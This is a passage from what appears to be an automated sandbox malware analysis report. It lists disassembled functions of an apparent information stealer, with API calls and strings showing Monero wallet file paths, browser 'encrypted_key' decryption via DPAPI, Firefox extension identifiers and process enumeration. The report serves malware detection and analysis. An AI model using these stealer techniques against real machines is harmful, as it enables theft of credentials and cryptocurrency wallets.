                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesslstrcpywsprintf
                              • String ID: %dx%d
                              • API String ID: 1695172769-2206825331
                              • Opcode ID: f4efc26e46c929e1a8958ef21b7f449abe5ebe9b06b835b6bc7899d17fd2a2cc
                              • Instruction ID: c5dc50422a25573887ff784cdb53f0e527ff25777a1ad9843462e4b32f33afa2
                              • Opcode Fuzzy Hash: f4efc26e46c929e1a8958ef21b7f449abe5ebe9b06b835b6bc7899d17fd2a2cc
                              • Instruction Fuzzy Hash: 762112B2A40308AFDB04DF94DD45FAEBBB8FB48711F104119F605B7280C7799911CBA5
                              Function 001D8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001D951E,00000000), ref: 001D8D5B
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D8D62
                              • wsprintfW.USER32 ref: 001D8D78
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcesswsprintf
                              • String ID: %hs
                              • API String ID: 769748085-2783943728
                              • Opcode ID: 6ee118ef627fd8d33aa4a02f19ed9d4cf0bc4348d6b439b433a2ade340de703f
                              • Instruction ID: c13457c5efcbb89115e05de464f4fe3640a04083dfb19cdf490072a8f501d2aa
                              • Opcode Fuzzy Hash: 6ee118ef627fd8d33aa4a02f19ed9d4cf0bc4348d6b439b433a2ade340de703f
                              • Instruction Fuzzy Hash: 70E0E675A50308BBD710EB94DD09E5D77B8EB44701F004164FD0997240DA719E549B56
                              Function 001CA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,014AA360,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CA2E1
                              • lstrlen.KERNEL32(00000000,00000000), ref: 001CA3FF
                              • lstrlen.KERNEL32(00000000), ref: 001CA6BC
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                              • DeleteFileA.KERNEL32(00000000), ref: 001CA743
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 259b1c64a67e407d3d793614e657c8e221c73d3e58bffd371ab127388ed2d1e9
                              • Instruction ID: 186d37cb0c1835077ff7e1d78c9ddefd24c0eed69cdff051900fa2988497e9a9
                              • Opcode Fuzzy Hash: 259b1c64a67e407d3d793614e657c8e221c73d3e58bffd371ab127388ed2d1e9
                              • Instruction Fuzzy Hash: 3CE115728101589BCB05FBA4DDA2EEE733CAF34301F90816AF51772191EF306A49DB66
                              Function 001CD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,014AA360,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CD481
                              • lstrlen.KERNEL32(00000000), ref: 001CD698
                              • lstrlen.KERNEL32(00000000), ref: 001CD6AC
                              • DeleteFileA.KERNEL32(00000000), ref: 001CD72B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: a4df5021301432186e0dfe2ba00fa3da503c8c88d3d3581b89f616024f0fd2ae
                              • Instruction ID: a0b8a9c972237b710213a3f332199564f1d2eea052f1debd676acfc8f1644d46
                              • Opcode Fuzzy Hash: a4df5021301432186e0dfe2ba00fa3da503c8c88d3d3581b89f616024f0fd2ae
                              • Instruction Fuzzy Hash: 659137728101589BCB04FBA4DD92EEE7338AF34301F90416AF50777291EF746A49DB66
                              Function 001CD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,014AA360,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CD801
                              • lstrlen.KERNEL32(00000000), ref: 001CD99F
                              • lstrlen.KERNEL32(00000000), ref: 001CD9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 001CDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: a4c92ca2db307cc0026c4ab93f3f66598d54f794e4b3421cee963da157002055
                              • Instruction ID: 40a0a76525c05511d1a3d783494369c071f9dc1b4606d06323be6419039e7a8c
                              • Opcode Fuzzy Hash: a4c92ca2db307cc0026c4ab93f3f66598d54f794e4b3421cee963da157002055
                              • Instruction Fuzzy Hash: 7B8126729101549BCB04FBA4DD96EEE7338AF34301F90452AF407B7291EF746A09DBA6
                              Function 001CF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                                • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                                • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                                • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                                • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                                • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                                • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,001E1580,001E0D92), ref: 001CF54C
                              • lstrlen.KERNEL32(00000000), ref: 001CF56B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                              • String ID: ^userContextId=4294967295$moz-extension+++
                              • API String ID: 998311485-3310892237
                              • Opcode ID: f209d61b540fe866096bc61181816b822377ff93632ff30e084753d76e9480be
                              • Instruction ID: 27be4091555c17d33ab18a40768bd0ac95e9a3e0449eb25e585e5413360264ee
                              • Opcode Fuzzy Hash: f209d61b540fe866096bc61181816b822377ff93632ff30e084753d76e9480be
                              • Instruction Fuzzy Hash: F7511771D10148ABDB04FBF4DC96DEE7379AF64300F808529F81667291EF346A09DBA6
                              Function 001D3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: cac642f7b46e1abbe841bd6809110eeaf7d7016e40ba306bddda887424657319
                              • Instruction ID: 68555ba846fb6f7f40096c3a29d75efee2b2ff55c86af448abb99a8f33eae192
                              • Opcode Fuzzy Hash: cac642f7b46e1abbe841bd6809110eeaf7d7016e40ba306bddda887424657319
                              • Instruction Fuzzy Hash: E8415EB1D10209ABCB04EFE5DC95AEEB774AF58304F40801AE41677390EB75AA45CFA6
                              Function 001C9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                                • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                                • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                                • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                                • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                                • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                                • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001C9D39
                                • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                                • Part of subcall function 001C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                                • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                                • Part of subcall function 001C9AC0: LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                                • Part of subcall function 001C9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001C9B84
                                • Part of subcall function 001C9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 001C9BA3
                                • Part of subcall function 001C9B60: LocalFree.KERNEL32(?), ref: 001C9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: 6c7b82edacc5229b39e627bed0d3bf498dc386a3cf8bd19d95c8dd6ff409370a
                              • Instruction ID: c8ca1c0dd15fb6b29c803d1cfc442054ca7034b35933b3b411e544c8eb8ced78
                              • Opcode Fuzzy Hash: 6c7b82edacc5229b39e627bed0d3bf498dc386a3cf8bd19d95c8dd6ff409370a
                              • Instruction Fuzzy Hash: 33311EB6D10209ABCB14DBE4DC89FEEB7B8AF68304F54451DE906B7241E735DA04CBA1
                              Function 001D8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001E05B7), ref: 001D86CA
                              • Process32First.KERNEL32(?,00000128), ref: 001D86DE
                              • Process32Next.KERNEL32(?,00000128), ref: 001D86F3
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                              • CloseHandle.KERNEL32(?), ref: 001D8761
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                              • String ID:
                              • API String ID: 1066202413-0
                              • Opcode ID: 94b5717ac8924cc6aec3e945214cdb9fb50577396b3f0a2fb6650cf57d7a8e45
                              • Instruction ID: c6a55ee32343d2d3f4b868e4634a809381449f8ca4b492df2459d1a09cfcd9e4
                              • Opcode Fuzzy Hash: 94b5717ac8924cc6aec3e945214cdb9fb50577396b3f0a2fb6650cf57d7a8e45
                              • Instruction Fuzzy Hash: 27317C71901258ABCB24EF91CC51FEEB778EF55700F5081AAF50AA22A0DF306E45CFA1
                              Function 001D7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                              Download Yara Rule
                              APIs
